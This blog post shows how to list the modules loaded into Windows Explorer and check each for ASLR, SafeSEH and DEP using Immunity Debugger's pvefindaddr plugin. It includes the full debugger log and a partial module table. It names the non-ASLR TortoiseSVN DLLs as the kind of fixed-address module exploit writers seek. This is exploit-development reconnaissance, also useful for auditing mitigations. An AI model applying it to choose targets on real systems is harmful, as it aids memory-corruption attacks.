Thursday, January 20, 2011

checking aslr, safeseh and more

A couple of days ago I noticed a post from Didier Stevens on how to check the ASLR status of shell extensions ( http://blog.didierstevens.com/2011/01/18/quickpost-checking-aslr/ ). In his approach he uses an excellent tool, Process Explorer, to list the modules. Another way of doing the same is with pvefindaddr and Immunity Debugger. pvefindaddr is a great tool, http://redmine.corelan.be:8800/projects/pvefindaddr, that exploit writers should at least be aware of.

A different way to check the loaded modules for ASLR status (and, at the same time, SafeSEH and NXCompat/DEP) is the following.

Grab a copy of pvefindaddr and copy it to the PyCommands directory of Immunity Debugger. Start the debugger with administrator privileges on Windows 7 and, from File, Attach, choose explorer.exe. You will see something like:
In the debugger, execute the command !pvefindaddr modules, wait a couple of seconds and open the log window; the following screen will appear:
There you will see all the modules and their status: Fixup (relocations present), SafeSEH, ASLR and NXCompat, plus whether the module is an OS DLL. Shell extensions are listed there too. The interesting rows are the ones with NO in the ASLR column, since those load at a fixed address and are the ones an exploit writer looks for; in my list the non-ASLR modules are the TortoiseSVN ones (TortoiseStub.dll, intl3_tsvn.dll, TortoiseOverlays.dll and libaprutil_tsvn.dll). For example, in my list I have the following:

Log data
Address    Message
           Immunity Debugger 1.80.0.1 : Yggdrasil
           Need support? visit http://forum.immunityinc.com/
           Error accesing memory
           File 'C:\Windows\explorer.exe'
           [10:17:09] New process with ID 00000F4C created
           Main thread with ID 000010F4 created
76E2EE2A   New thread with ID 00000AD8 created
76E2D662   New thread with ID 000008CC created
7528C89D   New thread with ID 000013B4 created
75F145E9   New thread with ID 00000C5C created
75DC12E5   New thread with ID 0000111C created
75F145E9   New thread with ID 0000145C created
76E2D662   New thread with ID 00001094 created
73A617A4   New thread with ID 00000A04 created
76E2D662   New thread with ID 0000157C created
76E2D662   New thread with ID 000012DC created
76E2D662   New thread with ID 00001098 created
75F145E9   New thread with ID 00000DD4 created
75F145E9   New thread with ID 00000898 created
75F145E9   New thread with ID 000016DC created
75F145E9   New thread with ID 0000138C created
75F145E9   New thread with ID 00000FD8 created
739E2F69   New thread with ID 00000878 created
75F145E9   New thread with ID 00001674 created
75F145E9   New thread with ID 0000124C created
7528C89D   New thread with ID 00000B70 created
6FA452C9   New thread with ID 0000130C created
76E2D662   New thread with ID 00000AF4 created
65BB268A   New thread with ID 00001470 created
7528C89D   New thread with ID 00000C44 created
76E2D662   New thread with ID 0000079C created
75F145E9   New thread with ID 0000090C created
76E2D662   New thread with ID 00001110 created
76E2D662   New thread with ID 00001728 created
76E9D315   New thread with ID 00000708 created
00B80000   Modules C:\Windows\explorer.exe
020A0000   Modules C:\Program Files\TortoiseSVN\bin\TortoiseSVN.dll
042D0000   Modules C:\Program Files\Notepad++\NppShell_01.dll
04320000   Modules C:\Program Files\7-Zip\7-zip.dll
043F0000   Modules C:\Windows\system32\thumbcache.dll
05940000   Modules C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll
05960000   Modules C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
10000000   Modules C:\Program Files\TortoiseSVN\bin\intl3_tsvn.dll
62890000   Modules C:\Windows\System32\SyncCenter.dll
65870000   Modules C:\Windows\System32\werconcpl.dll
65980000   Modules C:\Windows\system32\FXSRESM.DLL
65BB0000   Modules C:\Windows\system32\fxsst.dll
65D40000   Modules C:\Windows\System32\pnidui.dll
66EA0000   Modules c:\PROGRA~1\MIF707~1\shellext.dll
68BD0000   Modules C:\Windows\System32\ieframe.dll
69A80000   Modules C:\Windows\System32\bthprops.cpl
6AC60000   Modules C:\Windows\System32\Actioncenter.dll
6AD20000   Modules C:\Windows\System32\wscui.cpl
6AE40000   Modules C:\Windows\system32\ntshrui.dll
6AF20000   Modules C:\Windows\system32\msi.dll
6B4B0000   Modules C:\Windows\system32\imapi2.dll
6B550000   Modules C:\Windows\system32\NetworkExplorer.dll
6BAD0000   Modules C:\Windows\system32\PortableDeviceApi.dll
6BF10000   Modules C:\Windows\System32\WSCAPI.dll
6BF40000   Modules C:\Windows\system32\FXSAPI.dll
6BF80000   Modules C:\Windows\System32\provsvc.dll
6C050000   Modules C:\Windows\System32\wer.dll
6C0B0000   Modules C:\Windows\System32\gameux.dll
6C350000   Modules C:\Windows\System32\shdocvw.dll
6C380000   Modules C:\Windows\system32\actxprxy.dll
6C3E0000   Modules C:\Windows\System32\cscui.dll
6C450000   Modules C:\PROGRA~1\MICROS~3\Office14\1033\GrooveIntlResource.dll
             Invalid or compressed Image Export Directory
6CCC0000   Modules C:\PROGRA~1\MICROS~3\Office14\GROOVEEX.DLL
6D0D0000   Modules C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf
6D600000   Modules C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4974_none_51cdc180bbe4500f\ATL90.DLL
6D630000   Modules C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCR90.dll
6D7B0000   Modules C:\Windows\System32\UIAnimation.dll
6D7E0000   Modules C:\Windows\System32\hgcpl.dll
6D870000   Modules C:\Program Files\Internet Explorer\ieproxy.dll
6DB50000   Modules C:\Windows\system32\dxp.dll
6E240000   Modules C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCP90.dll
6E2F0000   Modules C:\Windows\System32\netprofm.dll
6E4B0000   Modules C:\Windows\system32\SHFOLDER.dll
6E540000   Modules C:\Windows\system32\WINSPOOL.DRV
6E6E0000   Modules C:\Windows\system32\EXPLORERFRAME.dll
6E970000   Modules C:\Windows\system32\PortableDeviceTypes.dll
6EAE0000   Modules C:\Windows\system32\msutb.dll
6ECB0000   Modules C:\Windows\system32\MPR.dll
6ECD0000   Modules C:\Windows\system32\LINKINFO.dll
6EE60000   Modules C:\Program Files\TortoiseSVN\bin\libaprutil_tsvn.dll
6EEC0000   Modules C:\Program Files\TortoiseSVN\bin\libapr_tsvn.dll
6F050000   Modules C:\Windows\system32\EhStorShell.dll
6F670000   Modules C:\Windows\system32\cscapi.dll
6FA40000   Modules C:\Windows\system32\Wlanapi.dll
70FA0000   Modules C:\Windows\system32\wlanutil.dll
71020000   Modules C:\Windows\system32\dhcpcsvc.DLL
713F0000   Modules C:\Windows\System32\WINNSI.DLL
71400000   Modules C:\Windows\System32\IPHLPAPI.DLL
71970000   Modules C:\Windows\system32\MsftEdit.dll
71A30000   Modules C:\Windows\system32\mssprxy.dll
71AA0000   Modules C:\Windows\system32\wwanapi.dll
71CD0000   Modules C:\Windows\system32\prnfldr.dll
71D40000   Modules C:\Windows\system32\BatMeter.dll
71E00000   Modules C:\Windows\System32\npmproxy.dll
71E20000   Modules C:\Windows\System32\QAgent.dll
71EA0000   Modules C:\Windows\system32\SYNCENG.dll
71EC0000   Modules C:\Windows\system32\syncui.dll
71F40000   Modules C:\Windows\System32\srchadmin.dll
71F90000   Modules C:\Program Files\WinRAR\rarext.dll
71FC0000   Modules C:\Windows\system32\twext.dll
71FF0000   Modules C:\Windows\System32\wercplsupport.dll
72010000   Modules C:\Windows\System32\framedynos.dll
721B0000   Modules C:\Windows\System32\cscobj.dll
72380000   Modules C:\Windows\System32\QUtil.dll
723A0000   Modules C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
72400000   Modules C:\Windows\system32\timedate.cpl
72480000   Modules C:\Windows\system32\EhStorAPI.dll
724B0000   Modules C:\Windows\system32\stobject.dll
72510000   Modules C:\Windows\System32\netshell.dll
72D90000   Modules C:\Windows\system32\dhcpcsvc6.DLL
72DD0000   Modules C:\Windows\System32\msxml6.dll
72F50000   Modules C:\Windows\system32\es.dll
72FA0000   Modules C:\Windows\system32\slc.dll
72FC0000   Modules C:\Windows\system32\ATL.DLL
730F0000   Modules C:\Windows\system32\taskschd.dll
731B0000   Modules C:\Windows\system32\POWRPROF.dll
73270000   Modules C:\Windows\System32\nlaapi.dll
734B0000   Modules C:\Windows\system32\ntmarta.dll
734F0000   Modules C:\Windows\system32\wwapi.dll
73500000   Modules C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
73510000   Modules C:\Windows\System32\wscinterop.dll
73530000   Modules C:\Windows\system32\SndVolSSO.DLL
73570000   Modules C:\Windows\System32\OLEACC.dll
73640000   Modules C:\Windows\System32\CSCDLL.dll
73650000   Modules C:\Windows\system32\wpdshserviceobj.dll
73690000   Modules C:\Windows\system32\AUDIOSES.DLL
736D0000   Modules C:\Windows\system32\msls31.dll
73700000   Modules C:\Windows\System32\AltTab.dll
73710000   Modules C:\Windows\ehome\ehSSO.dll
73720000   Modules C:\Windows\System32\shacct.dll
73750000   Modules C:\Windows\system32\wkscli.dll
73760000   Modules C:\Windows\system32\netutils.dll
73890000   Modules C:\Windows\system32\WindowsCodecs.dll
73990000   Modules C:\Windows\System32\XmlLite.dll
739C0000   Modules C:\Windows\system32\dwmapi.dll
739E0000   Modules C:\Windows\System32\MMDevApi.dll
73A20000   Modules C:\Windows\system32\HID.DLL
73A50000   Modules C:\Windows\System32\hcproviders.dll
73A60000   Modules C:\Windows\system32\msiltcfg.dll
73A70000   Modules C:\Windows\system32\DUser.dll
73AA0000   Modules C:\Windows\system32\DUI70.dll
73B60000   Modules C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
73CF0000   Modules C:\Windows\system32\UxTheme.dll
73D30000   Modules C:\Windows\system32\PROPSYS.dll
73E30000   Modules C:\Windows\system32\SAMLIB.dll
73E50000   Modules C:\Windows\system32\Syncreg.dll
73E60000   Modules C:\Windows\system32\IconCodecService.dll
73E70000   Modules C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll
74010000   Modules C:\Windows\system32\CRYPTUI.dll
74110000   Modules C:\Windows\system32\authui.dll
74340000   Modules C:\Windows\system32\WTSAPI32.dll
74410000   Modules C:\Windows\system32\VERSION.dll
74570000   Modules C:\Windows\system32\USERENV.dll
74750000   Modules C:\Windows\system32\DEVRTL.dll
74770000   Modules C:\Windows\system32\rsaenh.dll
74850000   Modules C:\Windows\system32\dnsapi.DLL
74990000   Modules C:\Windows\system32\MSWSOCK.dll
749D0000   Modules C:\Windows\system32\CRYPTSP.dll
74B90000   Modules C:\Windows\System32\wevtapi.dll
74DA0000   Modules C:\Windows\system32\srvcli.dll
74E10000   Modules C:\Windows\system32\Secur32.dll
74E30000   Modules C:\Windows\system32\SSPICLI.DLL
74E50000   Modules C:\Windows\system32\apphelp.dll
74EA0000   Modules C:\Windows\system32\CRYPTBASE.dll
74EB0000   Modules C:\Windows\system32\SXS.DLL
74F10000   Modules C:\Windows\System32\WINSTA.dll
74F40000   Modules C:\Windows\system32\RpcRtRemote.dll
74F50000   Modules C:\Windows\system32\profapi.dll
             Invalid or compressed Image Export Directory
74FC0000   Modules C:\Windows\system32\MSASN1.dll
75060000   Modules C:\Windows\system32\CRYPT32.dll
75180000   Modules C:\Windows\system32\WINTRUST.dll
751B0000   Modules C:\Windows\system32\CFGMGR32.dll
751E0000   Modules C:\Windows\system32\KERNELBASE.dll
75230000   Modules C:\Windows\system32\DEVOBJ.dll
75250000   Modules C:\Windows\system32\NSI.dll
75260000   Modules C:\Windows\system32\ole32.dll
753C0000   Modules C:\Windows\system32\GDI32.dll
75470000   Modules C:\Windows\system32\WININET.dll
75570000   Modules C:\Windows\system32\RPCRT4.dll
75620000   Modules C:\Windows\system32\kernel32.dll
75700000   Modules C:\Windows\system32\OLEAUT32.dll
75790000   Modules C:\Windows\system32\urlmon.dll
758D0000   Modules C:\Windows\system32\PSAPI.DLL
758E0000   Modules C:\Windows\system32\USER32.dll
759B0000   Modules C:\Windows\system32\WS2_32.dll
759F0000   Modules C:\Windows\system32\MSCTF.dll
75AC0000   Modules C:\Windows\system32\IMM32.dll
75AE0000   Modules C:\Windows\SYSTEM32\sechost.dll
75B80000   Modules C:\Windows\system32\SETUPAPI.dll
75D20000   Modules C:\Windows\system32\CLBCatQ.DLL
75DB0000   Modules C:\Windows\system32\msvcrt.dll
75E60000   Modules C:\Windows\system32\USP10.dll
75F00000   Modules C:\Windows\system32\SHLWAPI.dll
75F60000   Modules C:\Windows\system32\SHELL32.dll
76BB0000   Modules C:\Windows\system32\WLDAP32.dll
76C00000   Modules C:\Windows\system32\iertutil.dll
76E00000   Modules C:\Windows\SYSTEM32\ntdll.dll
76F40000   Modules C:\Windows\system32\LPK.dll
76F50000   Modules C:\Windows\system32\Normaliz.dll
76F60000   Modules C:\Windows\system32\ADVAPI32.dll
76E33574   [10:17:20] Attached process paused at ntdll.DbgBreakPoint
0BADF00D
0BADF00D
0BADF00D
0BADF00D   ** [+] Gathering executable / loaded module info, please wait...
0BADF00D   ** [+] Finished task, 170 modules found
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Loaded modules
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D     Fixup  |   Base     |    Top     |    Size    | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D      yes   | 0x72010000 | 0x72045000 | 0x00035000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - framedynos.dll : C:\Windows\System32\framedynos.dll
0BADF00D      yes   | 0x74990000 | 0x749CC000 | 0x0003C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - MSWSOCK.dll : C:\Windows\system32\MSWSOCK.dll
0BADF00D      yes   | 0x72400000 | 0x72478000 | 0x00078000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - timedate.cpl : C:\Windows\system32\timedate.cpl
0BADF00D      yes   | 0x6ECD0000 | 0x6ECD9000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - LINKINFO.dll : C:\Windows\system32\LINKINFO.dll
0BADF00D      yes   | 0x74FC0000 | 0x74FCC000 | 0x0000C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16415 - MSASN1.dll : C:\Windows\system32\MSASN1.dll
0BADF00D      yes   | 0x6E4B0000 | 0x6E4B5000 | 0x00005000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SHFOLDER.dll : C:\Windows\system32\SHFOLDER.dll
0BADF00D      yes   | 0x71970000 | 0x71A04000 | 0x00094000 |   yes   |  yes  |    yes   |   yes  | 5.41.21.2509 - MsftEdit.dll : C:\Windows\system32\MsftEdit.dll
0BADF00D      yes   | 0x736D0000 | 0x736FA000 | 0x0002A000 |   yes   |  yes  |    yes   |   yes  | 3.10.349.0 - msls31.dll : C:\Windows\system32\msls31.dll
0BADF00D      yes   | 0x739C0000 | 0x739D3000 | 0x00013000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dwmapi.dll : C:\Windows\system32\dwmapi.dll
0BADF00D      yes   | 0x730F0000 | 0x7316B000 | 0x0007B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - taskschd.dll : C:\Windows\system32\taskschd.dll
0BADF00D      yes   | 0x6F050000 | 0x6F081000 | 0x00031000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - EhStorShell.dll : C:\Windows\system32\EhStorShell.dll
0BADF00D      yes   | 0x72FA0000 | 0x72FAA000 | 0x0000A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - slc.dll : C:\Windows\system32\slc.dll
0BADF00D      yes   | 0x71FC0000 | 0x71FE7000 | 0x00027000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - twext.dll : C:\Windows\system32\twext.dll
0BADF00D      yes   | 0x734F0000 | 0x734FA000 | 0x0000A000 |   yes   |  yes  |    yes   |   yes  | 08.01.02.00 - wwapi.dll : C:\Windows\system32\wwapi.dll
0BADF00D      yes   | 0x65870000 | 0x65976000 | 0x00106000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - werconcpl.dll : C:\Windows\System32\werconcpl.dll
0BADF00D      yes   | 0x73710000 | 0x73718000 | 0x00008000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ehSSO.dll : C:\Windows\ehome\ehSSO.dll
0BADF00D      yes   | 0x73650000 | 0x7366D000 | 0x0001D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wpdshserviceobj.dll : C:\Windows\system32\wpdshserviceobj.dll
0BADF00D      yes   | 0x76C00000 | 0x76DFA000 | 0x001FA000 |   yes   |  yes  |    yes   |   yes  | 8.00.7600.16700 - iertutil.dll : C:\Windows\system32\iertutil.dll
0BADF00D      yes   | 0x73D30000 | 0x73E25000 | 0x000F5000 |   yes   |  yes  |    yes   |   yes  | 7.00.7600.16385 - PROPSYS.dll : C:\Windows\system32\PROPSYS.dll
0BADF00D      yes   | 0x74B90000 | 0x74BD2000 | 0x00042000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wevtapi.dll : C:\Windows\System32\wevtapi.dll
0BADF00D      yes   | 0x724B0000 | 0x724E9000 | 0x00039000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - stobject.dll : C:\Windows\system32\stobject.dll
0BADF00D      yes   | 0x713F0000 | 0x713F7000 | 0x00007000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WINNSI.DLL : C:\Windows\System32\WINNSI.DLL
0BADF00D      yes   | 0x75260000 | 0x753BC000 | 0x0015C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ole32.dll : C:\Windows\system32\ole32.dll
0BADF00D      yes   | 0x75F00000 | 0x75F57000 | 0x00057000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SHLWAPI.dll : C:\Windows\system32\SHLWAPI.dll
0BADF00D      yes   | 0x72F50000 | 0x72F97000 | 0x00047000 |   yes   |  yes  |    yes   |   yes  | 2001.12.8530.16385 - es.dll : C:\Windows\system32\es.dll
0BADF00D      yes   | 0x758E0000 | 0x759A9000 | 0x000C9000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - USER32.dll : C:\Windows\system32\USER32.dll
0BADF00D      yes   | 0x65BB0000 | 0x65C82000 | 0x000D2000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - fxsst.dll : C:\Windows\system32\fxsst.dll
0BADF00D      yes   | 0x6D7B0000 | 0x6D7CB000 | 0x0001B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - UIAnimation.dll : C:\Windows\System32\UIAnimation.dll
0BADF00D      yes   | 0x6ECB0000 | 0x6ECC2000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - MPR.dll : C:\Windows\system32\MPR.dll
0BADF00D      yes   | 0x74010000 | 0x74108000 | 0x000F8000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CRYPTUI.dll : C:\Windows\system32\CRYPTUI.dll
0BADF00D      yes   | 0x75180000 | 0x751AD000 | 0x0002D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16493 - WINTRUST.dll : C:\Windows\system32\WINTRUST.dll
0BADF00D      yes   | 0x73890000 | 0x7398B000 | 0x000FB000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WindowsCodecs.dll : C:\Windows\system32\WindowsCodecs.dll
0BADF00D      yes   | 0x73720000 | 0x7373E000 | 0x0001E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - shacct.dll : C:\Windows\System32\shacct.dll
0BADF00D      yes   | 0x73570000 | 0x735AC000 | 0x0003C000 |   yes   |  yes  |    yes   |   yes  | 7.0.0.0 - OLEACC.dll : C:\Windows\System32\OLEACC.dll
0BADF00D      yes   | 0x75F60000 | 0x76BA9000 | 0x00C49000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SHELL32.dll : C:\Windows\system32\SHELL32.dll
0BADF00D      yes   | 0x73510000 | 0x7352A000 | 0x0001A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wscinterop.dll : C:\Windows\System32\wscinterop.dll
0BADF00D      yes   | 0x73640000 | 0x73649000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CSCDLL.dll : C:\Windows\System32\CSCDLL.dll
0BADF00D      yes   | 0x75D20000 | 0x75DA3000 | 0x00083000 |   yes   |  yes  |    yes   |   yes  | 2001.12.8530.16385 - CLBCatQ.DLL : C:\Windows\system32\CLBCatQ.DLL
0BADF00D      yes   | 0x73A20000 | 0x73A29000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - HID.DLL : C:\Windows\system32\HID.DLL
0BADF00D      yes   | 0x739E0000 | 0x73A19000 | 0x00039000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - MMDevApi.dll : C:\Windows\System32\MMDevApi.dll
0BADF00D      yes   | 0x71E20000 | 0x71E4E000 | 0x0002E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - QAgent.dll : C:\Windows\System32\QAgent.dll
0BADF00D      yes   | 0x65980000 | 0x65A63000 | 0x000E3000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - FXSRESM.DLL : C:\Windows\system32\FXSRESM.DLL
0BADF00D      yes   | 0x751B0000 | 0x751D7000 | 0x00027000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CFGMGR32.dll : C:\Windows\system32\CFGMGR32.dll
0BADF00D      yes   | 0x74850000 | 0x74894000 | 0x00044000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dnsapi.DLL : C:\Windows\system32\dnsapi.DLL
0BADF00D      yes   | 0x6B4B0000 | 0x6B514000 | 0x00064000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - imapi2.dll : C:\Windows\system32\imapi2.dll
0BADF00D      yes   | 0x71EA0000 | 0x71EB6000 | 0x00016000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SYNCENG.dll : C:\Windows\system32\SYNCENG.dll
0BADF00D      yes   | 0x6C050000 | 0x6C0B0000 | 0x00060000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wer.dll : C:\Windows\System32\wer.dll
0BADF00D      yes   | 0x74E30000 | 0x74E4A000 | 0x0001A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SSPICLI.DLL : C:\Windows\system32\SSPICLI.DLL
0BADF00D      yes   | 0x731B0000 | 0x731D5000 | 0x00025000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - POWRPROF.dll : C:\Windows\system32\POWRPROF.dll
0BADF00D      yes   | 0x6D870000 | 0x6D89B000 | 0x0002B000 |   yes   |  yes  |    yes   |   NO   | 8.00.7600.16700 - ieproxy.dll : C:\Program Files\Internet Explorer\ieproxy.dll
0BADF00D      yes   | 0x6BF10000 | 0x6BF1F000 | 0x0000F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WSCAPI.dll : C:\Windows\System32\WSCAPI.dll
0BADF00D      yes   | 0x75790000 | 0x758C5000 | 0x00135000 |   yes   |  yes  |    yes   |   yes  | 8.00.7600.16385 - urlmon.dll : C:\Windows\system32\urlmon.dll
0BADF00D      NO    | 0x05940000 | 0x0594E000 | 0x0000E000 |   yes   |  NO   |    NO    |   NO   | 1.6.11.20210 - TortoiseStub.dll : C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll
0BADF00D      yes   | 0x74F10000 | 0x74F39000 | 0x00029000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WINSTA.dll : C:\Windows\System32\WINSTA.dll
0BADF00D      yes   | 0x6D0D0000 | 0x6D4DF000 | 0x0040F000 |   yes   |  yes  |    NO    |   NO   | 14.0.4738.1000 - office.odf : C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf
0BADF00D      yes   | 0x6DB50000 | 0x6DBB4000 | 0x00064000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dxp.dll : C:\Windows\system32\dxp.dll
0BADF00D      yes   | 0x75620000 | 0x756F4000 | 0x000D4000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - kernel32.dll : C:\Windows\system32\kernel32.dll
0BADF00D      yes   | 0x74EA0000 | 0x74EAC000 | 0x0000C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CRYPTBASE.dll : C:\Windows\system32\CRYPTBASE.dll
0BADF00D      yes   | 0x76E00000 | 0x76F3C000 | 0x0013C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll
0BADF00D      yes   | 0x75AE0000 | 0x75AF9000 | 0x00019000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - sechost.dll : C:\Windows\SYSTEM32\sechost.dll
0BADF00D      yes   | 0x6D630000 | 0x6D6D3000 | 0x000A3000 |   yes   |  yes  |    yes   |   yes  | 9.00.30729.4974 - MSVCR90.dll : C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCR90.dll
0BADF00D      yes   | 0x6D600000 | 0x6D62B000 | 0x0002B000 |   yes   |  yes  |    yes   |   yes  | 9.00.30729.4974 - ATL90.DLL : C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4974_none_51cdc180bbe4500f\ATL90.DLL
0BADF00D      yes   | 0x6EAE0000 | 0x6EB0C000 | 0x0002C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - msutb.dll : C:\Windows\system32\msutb.dll
0BADF00D      yes   | 0x73A50000 | 0x73A59000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - hcproviders.dll : C:\Windows\System32\hcproviders.dll
0BADF00D      yes   | 0x73A60000 | 0x73A67000 | 0x00007000 |   yes   |  yes  |    yes   |   yes  | 5.0.7600.16385 - msiltcfg.dll : C:\Windows\system32\msiltcfg.dll
0BADF00D      yes   | 0x75470000 | 0x75564000 | 0x000F4000 |   yes   |  yes  |    yes   |   yes  | 8.00.7600.16385 - WININET.dll : C:\Windows\system32\WININET.dll
0BADF00D      yes   | 0x00B80000 | 0x00E01000 | 0x00281000 |   yes   |  yes  |    NO    |   yes  | 6.1.7600.16385 - explorer.exe : C:\Windows\explorer.exe
0BADF00D      NO    | 0x10000000 | 0x10012000 | 0x00012000 |   yes   |  NO   |    NO    |   NO   | 0.14.4 - intl3_tsvn.dll : C:\Program Files\TortoiseSVN\bin\intl3_tsvn.dll
0BADF00D      yes   | 0x62890000 | 0x62A9E000 | 0x0020E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SyncCenter.dll : C:\Windows\System32\SyncCenter.dll
0BADF00D      yes   | 0x6C350000 | 0x6C37E000 | 0x0002E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - shdocvw.dll : C:\Windows\System32\shdocvw.dll
0BADF00D      yes   | 0x758D0000 | 0x758D5000 | 0x00005000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - PSAPI.DLL : C:\Windows\system32\PSAPI.DLL
0BADF00D      yes   | 0x75AC0000 | 0x75ADF000 | 0x0001F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - IMM32.dll : C:\Windows\system32\IMM32.dll
0BADF00D      yes   | 0x73500000 | 0x7350D000 | 0x0000D000 |   yes   |  yes  |    NO    |   NO   | 14.0.4750.1000 - MSOXMLMF.DLL : C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
0BADF00D      yes   | 0x6F670000 | 0x6F67B000 | 0x0000B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - cscapi.dll : C:\Windows\system32\cscapi.dll
0BADF00D      yes   | 0x73CF0000 | 0x73D30000 | 0x00040000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - UxTheme.dll : C:\Windows\system32\UxTheme.dll
0BADF00D      yes   | 0x71400000 | 0x7141C000 | 0x0001C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - IPHLPAPI.DLL : C:\Windows\System32\IPHLPAPI.DLL
0BADF00D      yes   | 0x71D40000 | 0x71DF7000 | 0x000B7000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - BatMeter.dll : C:\Windows\system32\BatMeter.dll
0BADF00D      yes   | 0x76F40000 | 0x76F4A000 | 0x0000A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - LPK.dll : C:\Windows\system32\LPK.dll
0BADF00D      yes   | 0x6E970000 | 0x6E99B000 | 0x0002B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - PortableDeviceTypes.dll : C:\Windows\system32\PortableDeviceTypes.dll
0BADF00D      NO    | 0x05960000 | 0x05978000 | 0x00018000 |   yes   |  NO   |    NO    |   NO   | 1.1.1.19039 - TortoiseOverlays.dll : C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
0BADF00D      yes   | 0x74F50000 | 0x74F5B000 | 0x0000B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - profapi.dll : C:\Windows\system32\profapi.dll
0BADF00D      yes   | 0x71020000 | 0x71032000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dhcpcsvc.DLL : C:\Windows\system32\dhcpcsvc.DLL
